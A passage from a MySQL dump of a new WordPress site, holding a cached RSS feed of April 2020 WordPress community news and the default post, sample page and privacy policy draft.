\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 07 Apr 2020 20:00:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"Post Status: Free event: Learn from top consultants during Post Status Live: Client Work\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=78476\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://poststatus.com/learn-live-client-work/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3345:\"

No doubt about it, we\'re in uncertain times and heading for very rough economic waters.

\n\n\n\n

If you work with clients, you\'ve already been seeing this.

\n\n\n\n

But as an agency owner, consultant, or freelancer, this isn\'t the time to freeze in fear, it\'s the time to double down, to act and to keep moving forward, to see opportunity and to seize it.

\n\n\n\n

At Post Status, we want to strengthen you, bolster you and energize you for what lies ahead as a WordPress professional.

\n\n\n\n

This Friday, April 10, carve out a half day to get ideas and be inspired, to make plans, to take a big deep breath before you attack this next season of life and business, as part of our free online learning event called Post Status Live: Client Work.

\n\n\n\n

We\'ll spend time talk with experienced consultants, discussing things that matter to you:

\n\n\n\n\n\n\n\n

We are privileged to have veterans of client work who will be sharing their insights, experiences and tips:

\n\n\n\n\n\n\n\n

Each session will be moderated by Post Status partners Brian Krogsgard and Cory Miller.

\n\n\n\n

You won\'t want to miss this free event.

\n\n\n\n

Register Today!

\n\n\n\n

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 07 Apr 2020 02:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Cory Miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Proposal to Move WordPress Theme Review Process to GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98312\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:179:\"https://wptavern.com/proposal-to-move-wordpress-theme-review-process-to-github?utm_source=rss&utm_medium=rss&utm_campaign=proposal-to-move-wordpress-theme-review-process-to-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5516:\"

Denis Žoljom, the automation representative for the WordPress theme review team, proposed moving much of the theme review system over to GitHub. The idea is to move the interactive parts of the review away from the current system. The proposal claims such a move would streamline the process via automated tools and make the manual, reviewer-to-author interactions easier.

\n\n\n\n

Currently, the theme review process takes place on Trac. For many theme authors and reviewers, the software can feel archaic. It does not have the feature set that developers have become accustomed to with other solutions. With the move of major parts of WordPress, such as feature plugin development, to GitHub over the past few years, it might be time to reevaluate other areas of the core project.

\n\n\n\n

Žoljom noted in the proposal that reviews handled through Trac are cumbersome. As a former theme review team lead and reviewer, I know how many on the team feel. Right now, much of the review process is manual. It is handled via a lot of back-and-forth communication between the reviewer and author. There is no good way to leave a note or comment on a specific line of code when there is an issue. This ongoing discussion between reviewer and author is sometimes hindered by a language barrier. The experience of comparing changes between code updates is lackluster at best. Plus, the only automated check is handled by the Theme Check plugin.

\n\n\n\n

Handling reviews on GitHub opens a new world of possibilities that could make reviews more efficient and provide a better experience on both ends of the process.

\n\n\n\n

From 2015 through 2019, I ran a side business with a partner where we performed code reviews on plugins and themes. The majority of that business was working with commercial theme shops. Around 90% of the reviews were handled on GitHub.

\n\n\n\n

At the same time, I was still volunteering with the WordPress theme review team. There was no comparison in terms of user experience. GitHub won hands down. This experience turned me away from wanting to perform reviews for the official directory. Nothing there was streamlined. It was tougher to point to specific code issues and check if a problem was corrected when an author sent in an update.

\n\n\n\n

Žoljom’s initial proposal outlines a system where the theme author submits their theme through the WordPress theme upload page. If it passes the initial check, the system would automatically create a new GitHub repository with the theme. Theme authors can then fork this newly-created repository to work on code changes based on reviewer feedback. Theme updates would also work through GitHub.

\n\n\n\n

“I think that forks are a good middle ground,” said Žoljom. “Authors have forks on their own GitHub accounts and can update those, and make updates that way even. That would definitely help us with people who are trying to trick the system by updating their themes once they go live with things that break the requirements.”

\n\n\n\n

The proposal is merely an idea to explore at this stage. Much of the process could change if it is given the green light to proceed.

\n\n\n\n

“In the end, I hope this initiative will go live and help us bring the review queue down,” said Žoljom. He has hopes the team can integrate more automated checks such as the WordPress Coding Standards. With more automation, it could also mean the theme review team could focus on other projects it works on, such as preparing for the future of full-site editing and continuing education.

\n\n\n\n

Beyond the Review Process

\n\n\n\n

One of the primary issues the team has faced over the years is educating authors on writing cleaner and more secure code. Some issues like sanitizing data on input and escaping it on output are still prevalent during reviews. The team’s history of communication via Trac has not seemed to help with education on the whole.

\n\n\n\n

“The main point is the fact that many people can be involved in the review process, and then you have experienced reviewers who can show why some code is not good or needs improvement,” said Žoljom. “This provides a way for many people to see what is wrong with the code and how they can improve it. Plus the forked theme stays in their repo, so they can see the changes that they made and why.”

\n\n\n\n

Žoljom has a few items in reserve for the long-term wish list. One possibility for the future may be setting up themes on Packagist for installation via Composer. He admits that it is a longshot at best.

\n\n\n\n

“I see this as an opportunity to bring one aspect of WordPress up to par with other modern PHP frameworks like Laravel,” he said. “Plus, utilize automatic tools at our disposal. From PHP CodeSniffer, PHPStan, ES Lint, and a plethora of other tools, we could also show authors how they can set these tools on their projects and make their coding skills better. Maybe throw some automatic integration tests in the mix. The possibilities are really endless.”

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 06 Apr 2020 20:08:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: Proposal to Add a Consent API to WordPress, Feature Plugin Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98269\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:199:\"https://wptavern.com/proposal-to-add-a-consent-api-to-wordpress-feature-plugin-available?utm_source=rss&utm_medium=rss&utm_campaign=proposal-to-add-a-consent-api-to-wordpress-feature-plugin-available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4432:\"

On Wednesday, Garret Hyder announced a feature proposal for a WordPress Consent API. The proposal is one step on the larger privacy roadmap for core. If merged into WordPress, it would establish a standard method for core, plugins, and themes to obtain consent for various privacy-related features. The idea is to create a consistent experience for developers, site administrators, and site visitors.

\n\n\n\n

The WP Consent API plugin is available via the WordPress plugin directory. Development is currently happening on the plugin’s GitHub repository.

\n\n\n\n

Hyder identified several areas in which an API for handling consent could help in bringing a site into compliance with various privacy laws:

\n\n\n\n\n\n\n\n

“Primarily this API is aimed at helping to achieve a compliant use of cookies or other means of tracking by WordPress websites,” wrote Hyder in the proposal. “If a plugin or custom code triggers, for example, Facebook, usage of this API will be of help to ensure consent. If a user manually embeds a Facebook iframe, a cookie blocker is needed that initially disables the iframe and or scripts.”

\n\n\n\n

The goal is not to create functionality that would block third-party scripts, such as tracking from a site like Facebook. Because different jurisdictions have their own laws across the world, the actual management of blocking functionality would be best suited for a consent management plugin. This would be outside of the scope of what WordPress does out of the box. By providing an API directly in core, it would allow plugin developers to build consent management plugins that are needed in different locations. The API would merely be a means for all plugins to talk the same language. That standardization would allow consent management plugins to work as they should.

\n\n\n\n

Furthermore, adding a front-end user interface would place additional scripts, styles, and functionality on all WordPress sites. These types are things are best handled by plugin developers.

\n\n\n\n

The API proposes allowing the creation of consent categories. Such categories might be preferences, marketing, or statistics. They would be filterable by plugins. The API has two indicators to determine consent for a category: a region-based consent type, which can be opt-in or opt-out, and the visitor’s choice.

\n\n\n\n

The team working on the project has put together a Consent API Demo to see how this plugin would work along with consent management on a website’s front end. The demo makes use of the Complianz plugin and an example plugin for showcasing how the API works.

\n\n\n\n

Consent management is a tough area to handle in terms of web design and development. On the one hand, respecting the privacy laws of various jurisdictions is necessary for many people around the world. On the other hand, cookie notice popups on websites often create a poor user experience for site visitors, and that experience may only get worse before it gets better.

\n\n\n\n

However, a standard API is past due in core WordPress. This will at least provide plugin authors with a means of working with consent management plugins. In time, maybe we will find a front-end interface that creates a nice experience while maintaining privacy.

\n\n\n\n

The team is currently looking for feedback on the proposal and plugin. If the feature proposal is accepted, authors of consent management plugins should be prepared to begin integrating with the API.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Apr 2020 19:25:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WordPress.org blog: The Month in WordPress: March 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8532\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/04/the-month-in-wordpress-march-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8586:\"

The month of March was both a tough and exciting time for the WordPress open-source project. With COVID-19 declared a pandemic, in-person events have had to adapt quickly – a challenge for any community. March culminated with the release of WordPress 5.4, an exhilarating milestone only made possible by dedicated contributors. For all the latest, read on. 

\n\n\n\n
\n\n\n\n

WordPress 5.4 “Adderley”

\n\n\n\n

WordPress 5.4 “Adderley” was released on March 31 and includes a robust list of new blocks, enhancements, and new features for both users and developers. The primary focus areas of this release included the block editor, privacy, accessibility, and developer improvements, with the full list of enhancements covered in the 5.4 field guide.

\n\n\n\n

Want to get involved in building WordPress Core? Follow the Core team blog, and join the #core channel in the Making WordPress Slack group.

\n\n\n\n

Releases of Gutenberg 7.7 and 7.8

\n\n\n\n

It’s been another busy month for Gutenberg, this time with the release of Gutenberg 7.7 and 7.8. Gutenberg 7.7 introduced block patterns – predefined block layouts that are ready to use and tweak. This is an important step towards Full Site Editing, which is currently targeted for inclusion in WordPress 5.6. As a first iteration, you can pick and insert patterns from the Block Patterns UI, which has been added as a sidebar plugin.

\n\n\n\n

Gutenberg 7.7 also includes a refresh of the Block UI, which better responds to the ways users interact with the editor. For more information on the User UI and Block Patterns, read this summary of the most recent Block-Based Themes meeting. Gutenberg 7.8, introduced on March 25, further enhanced this Block UI redesign. Both releases also included a suite of improvements, bug fixes, new APIs, documentation, and more!

\n\n\n\n

Want to get involved in building Gutenberg? Follow the Core team blog, contribute to Gutenberg on GitHub, and join the #core-editor channel in the Making WordPress Slack group.

\n\n\n\n

WordCamp cancellations and shift to online events

\n\n\n\n

In early March, the Community team issued new recommendations for event organizers in light of growing concerns around COVID-19. Following this guidance, and with COVID-19 declared a pandemic, WordPress community organizers reluctantly but responsibly postponed or canceled their upcoming WordCamps and meetups.

\n\n\n\n

As community events are an important part of the WordPress open-source project, the Community team made suggestions for taking charity hackathons online, proposed interim adjustments to existing community event guidelines, and provided training for online conference organizing with Crowdcast. The team is currently working on building a Virtual Events Handbook that will continue to support WordPress community organizers at this time. 

\n\n\n\n

Want to get involved with the WordPress Community team, host your own virtual WordPress event, or help improve the documentation for all of this? Follow the Community team blog, learn more about virtual events, and join the #community-events channel in the Making WordPress Slack group.

\n\n\n\n

Link your GitHub profile to WordPress.org

\n\n\n\n

Last month, an experimental feature was added to Trac, WordPress Core’s bug-tracking system, to improve collaboration between Trac and GitHub. This month, to help make tracking contributions to the WordPress project across multiple locations easier, there is a new option to connect your GitHub account to your WordPress.org profile. This connection allows for more accurate acknowledgement and recognition of contributors. You can connect your GitHub account to your WordPress.org account by editing your WordPress.org profile.

\n\n\n\n

For more information and instructions on how to connect your accounts, read the announcement post.

\n\n\n\n

Modernizing WordPress coding standards

\n\n\n\n

Defined coding standards is an important step in creating the consistent codebase needed to prepare for requiring PHP 7.x for WordPress Core. As such, coding standards have been proposed for implementation in WordPress Coding Standards 3.0.0. This includes new proposed standards for namespace declarations, import use statements, fully qualified names in inline code, traits and interfaces, type declarations, declare statements/strict typing, the ::class constant, operators, and more. 

\n\n\n\n

Want to get involved or view the full list of currently proposed new coding standards? Visit and add your feedback to the post on updating the Coding standards for modern PHP and follow the Core team blog.

\n\n\n\n
\n\n\n\n

Further Reading:

\n\n\n\n\n\n\n\n

Have a story that we should include in the next “Month in WordPress” post? Please submit it here.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Apr 2020 12:01:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Gary: Bebo, Betty, and Jaco\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"https://pento.net/?p=5166\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://pento.net/2020/04/03/bebo-betty-and-jaco/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:643:\"

Wait, wasn’t WordPress 5.4 just released?

\n\n\n\n

It absolutely was, and congratulations to everyone involved! Inspired by the fine work done to get another release out, I finally completed the last step of co-leading WordPress 5.0, 5.1, and 5.2 (Bebo, Betty, and Jaco, respectively).

\n\n\n\n\"\"\n\n\n\n

My study now has a bit more jazz in it. \"🙂\"

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Apr 2020 01:51:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Gary\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 05 May 2020 07:25:29 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Tue, 05 May 2020 07:15:08 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";s:16:\"content-encoding\";s:4:\"gzip\";}}s:5:\"build\";s:14:\"20130911133210\";}','no'),(140,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1588706729','no'),(141,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1588663529','no'),(142,'_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b','1588706729','no'),(143,'_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b','
','no'); /*!40000 ALTER TABLE `wpmd_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpmd_postmeta` -- DROP TABLE IF EXISTS `wpmd_postmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_postmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_id` bigint(20) unsigned NOT NULL DEFAULT 0, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_postmeta` -- LOCK TABLES `wpmd_postmeta` WRITE; /*!40000 ALTER TABLE `wpmd_postmeta` DISABLE KEYS */; INSERT INTO `wpmd_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (1,2,'_wp_page_template','default'),(2,3,'_wp_page_template','default'); /*!40000 ALTER TABLE `wpmd_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpmd_posts` -- DROP TABLE IF EXISTS `wpmd_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_posts` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_author` bigint(20) unsigned NOT NULL DEFAULT 0, `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL DEFAULT 'publish', `comment_status` varchar(20) NOT NULL DEFAULT 'open', `ping_status` varchar(20) NOT NULL DEFAULT 'open', `post_password` varchar(255) NOT NULL DEFAULT '', `post_name` varchar(200) NOT NULL DEFAULT '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0, `guid` varchar(255) NOT NULL DEFAULT '', `menu_order` int(11) NOT NULL DEFAULT 0, `post_type` varchar(20) NOT NULL DEFAULT 'post', `post_mime_type` varchar(100) NOT NULL DEFAULT '', `comment_count` bigint(20) NOT NULL DEFAULT 0, PRIMARY KEY (`ID`), KEY `post_name` (`post_name`(191)), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_posts` -- LOCK TABLES `wpmd_posts` WRITE; /*!40000 ALTER TABLE `wpmd_posts` DISABLE KEYS */; INSERT INTO `wpmd_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (1,1,'2020-05-05 07:24:57','2020-05-05 07:24:57','\n

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

\n','Hello world!','','publish','open','open','','hello-world','','','2020-05-05 07:24:57','2020-05-05 07:24:57','',0,'https://tummyrevolution.com/?p=1',0,'post','',1),(2,1,'2020-05-05 07:24:57','2020-05-05 07:24:57','\n

This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:

\n\n\n\n

Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)

\n\n\n\n

...or something like this:

\n\n\n\n

The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.

\n\n\n\n

As a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!

\n','Sample Page','','publish','closed','open','','sample-page','','','2020-05-05 07:24:57','2020-05-05 07:24:57','',0,'https://tummyrevolution.com/?page_id=2',0,'page','',0),(3,1,'2020-05-05 07:24:57','2020-05-05 07:24:57','

Who we are

Our website address is: https://tummyrevolution.com.

What personal data we collect and why we collect it

Comments

When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.

An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.

Media

If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.

Contact forms

Cookies

If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.

If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.

When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.

If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.

Embedded content from other websites

Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.

These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.

Analytics

Who we share your data with

How long we retain your data

If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.

For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.

What rights you have over your data

If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.

Where we send your data

Visitor comments may be checked through an automated spam detection service.

Your contact information

Additional information

How we protect your data

What data breach procedures we have in place

What third parties we receive data from

What automated decision making and/or profiling we do with user data

Industry regulatory disclosure requirements

','Privacy Policy','','draft','closed','open','','privacy-policy','','','2020-05-05 07:24:57','2020-05-05 07:24:57','',0,'https://tummyrevolution.com/?page_id=3',0,'page','',0),(4,1,'2020-05-05 07:25:21','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-05-05 07:25:21','0000-00-00 00:00:00','',0,'https://tummyrevolution.com/?p=4',0,'post','',0); /*!40000 ALTER TABLE `wpmd_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpmd_term_relationships` -- DROP TABLE IF EXISTS `wpmd_term_relationships`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL DEFAULT 0, `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0, `term_order` int(11) NOT NULL DEFAULT 0, PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_term_relationships` -- LOCK TABLES `wpmd_term_relationships` WRITE; /*!40000 ALTER TABLE 